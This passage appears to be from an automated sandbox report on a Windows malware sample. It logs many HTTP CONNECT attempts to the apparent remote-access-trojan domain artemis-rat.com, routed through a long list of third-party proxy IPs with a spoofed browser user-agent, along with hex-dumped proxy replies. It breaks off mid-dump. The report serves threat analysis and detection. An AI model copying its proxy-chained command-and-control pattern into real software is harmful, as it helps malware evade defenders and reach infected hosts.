                                              467192.168.2.451314203.150.128.9080807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.047282934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.420533895 CET202INHTTP/1.0 403 Forbidden
                                              Content-Length: 479
                                              Content-Type: text/html
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Expires: Mon, 11 Mar 2024 07:37:19 GMT
                                              Server: Mikrotik HttpProxy
                                              Proxy-Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              468192.168.2.451344147.75.34.86100007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.047359943 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:19.350904942 CET65INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Zscaler/6.3


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              469192.168.2.451205102.132.50.680807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.048759937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.906235933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              470192.168.2.451361147.75.34.85100117284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.049170017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.352869034 CET65INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Zscaler/6.3


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              471192.168.2.451346173.212.209.49316737284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.049482107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.725575924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.663858891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.554255962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.356899023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.163386106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.039092064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:41.560507059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:56.522465944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              472192.168.2.45063345.11.95.16560117284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.061430931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              473192.168.2.450581203.154.39.146807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.061502934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.163162947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257380009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.257165909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.271074057 CET806INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:37 GMT
                                              Server: Apache/2.4.29 (Ubuntu)
                                              Content-Length: 614
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              474192.168.2.45073198.162.25.1641457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.061507940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              475192.168.2.450605103.169.130.4980807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.064517975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              476192.168.2.451548104.25.115.125807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.067224026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.221810102 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              477192.168.2.45146072.210.252.13741457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.067327976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              478192.168.2.451340103.199.18.248807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.067456007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.412812948 CET176INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain; charset=utf-8
                                              X-Content-Type-Options: nosniff
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Length: 19
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              479192.168.2.45142259.6.26.121807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.067873955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              480192.168.2.45146272.206.181.10341457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.071022987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              481192.168.2.450654179.43.8.1680887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.071311951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.261869907 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              482192.168.2.451435211.222.252.18781977284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.072237015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              483192.168.2.45139594.131.14.6610817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.072818995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              484192.168.2.451382208.109.14.49420727284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.076081991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.788055897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.858762026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.926302910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.069628000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.257143974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366465092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              485192.168.2.45141145.138.87.23810807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.079622030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              486192.168.2.45153238.162.31.22631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.079997063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.494259119 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              487192.168.2.45083592.204.136.149166917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.084781885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              488192.168.2.45080698.188.47.13241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.090683937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              489192.168.2.451521190.5.77.211807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.090822935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.647429943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.350660086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.757725954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.570292950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.569727898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.257462025 CET805INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:48 GMT
                                              Server: Apache/2.4.54 (Debian)
                                              Content-Length: 613
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 